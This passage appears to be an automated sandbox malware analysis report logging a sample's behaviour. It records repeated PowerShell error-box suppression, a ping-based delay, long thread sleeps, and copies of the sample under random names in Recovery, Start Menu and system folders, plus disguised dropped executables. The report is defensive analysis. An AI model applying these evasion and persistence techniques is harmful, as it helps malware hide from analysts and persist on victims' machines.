                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeMemory allocated: 16B0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeMemory allocated: 1B320000 memory reserve | memory write watch
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeMemory allocated: F80000 memory reserve | memory write watch
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeMemory allocated: 1ADA0000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeMemory allocated: 32A0000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeMemory allocated: 1B2A0000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeMemory allocated: 1750000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeMemory allocated: 1B3A0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeMemory allocated: 810000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeMemory allocated: 1A4F0000 memory reserve | memory write watch
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeMemory allocated: CA0000 memory reserve | memory write watch
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeMemory allocated: 1A8E0000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeMemory allocated: 30D0000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeMemory allocated: 1B0D0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeMemory allocated: C40000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeMemory allocated: 1A960000 memory reserve | memory write watch
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeMemory allocated: 3060000 memory reserve | memory write watch
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeMemory allocated: 1B2B0000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeMemory allocated: 28C0000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeMemory allocated: 1A8C0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeMemory allocated: 10A0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeMemory allocated: 1ACF0000 memory reserve | memory write watch
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeMemory allocated: 710000 memory reserve | memory write watch
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeMemory allocated: 1A350000 memory reserve | memory write watch
                            Source: C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeMemory allocated: 1AC0000 memory reserve | memory write watch
                            Source: C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeMemory allocated: 1B320000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeMemory allocated: 17E0000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeMemory allocated: 1B2A0000 memory reserve | memory write watch
                            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeMemory allocated: 1800000 memory reserve | memory write watch
                            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeMemory allocated: 1B3C0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeMemory allocated: 17A0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeMemory allocated: 1B300000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 922337203685477
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 600000
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 599766
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 599563
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 599406
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 599255
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 599110
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 598957
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 598817
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 598649
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 3600000
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 598469
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 598321
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 598202
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 598090
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 597979
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 597851
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 597422
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 597063
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 596922
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 596781
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 596668
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 596538
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 596360
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 596188
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 596047
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 595937
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 595818
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 595662
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 595500
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 595352
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 595078
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 594500
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 594292
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 594172
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 594051
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 593922
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 593813
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 593697
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 593594
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 593482
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 593375
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 300000
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 593266
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 593155
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 593037
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 592884
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 592779
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 592672
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 592563
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 592453
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 592338
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 592188
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 591672
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 591533
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 591406
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 591297
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 591188
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 591078
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 590967
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 590847
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 590719
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 590609
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 590500
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 590388
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 590268
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2491
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2145
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1914
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2124
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2083
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2421
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeWindow / User API: threadDelayed 4564
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeWindow / User API: threadDelayed 5029
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeDropped PE file which has not been started: C:\Users\user\Desktop\vTqzCdqK.log
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeDropped PE file which has not been started: C:\Users\user\Desktop\nmJRokpY.log
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeDropped PE file which has not been started: C:\Users\user\Desktop\FpFoWZYA.log
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeDropped PE file which has not been started: C:\Users\user\Desktop\CnTGBqTF.log
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exe TID: 4108Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7516Thread sleep count: 2491 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7852Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7784Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep count: 2145 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7864Thread sleep time: -1844674407370954s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7736Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7556Thread sleep count: 1914 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7848Thread sleep time: -1844674407370954s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7744Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7600Thread sleep count: 2124 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7868Thread sleep time: -1844674407370954s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7728Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7624Thread sleep count: 2083 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7844Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7792Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7660Thread sleep count: 2421 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884Thread sleep time: -922337203685477s >= -30000s
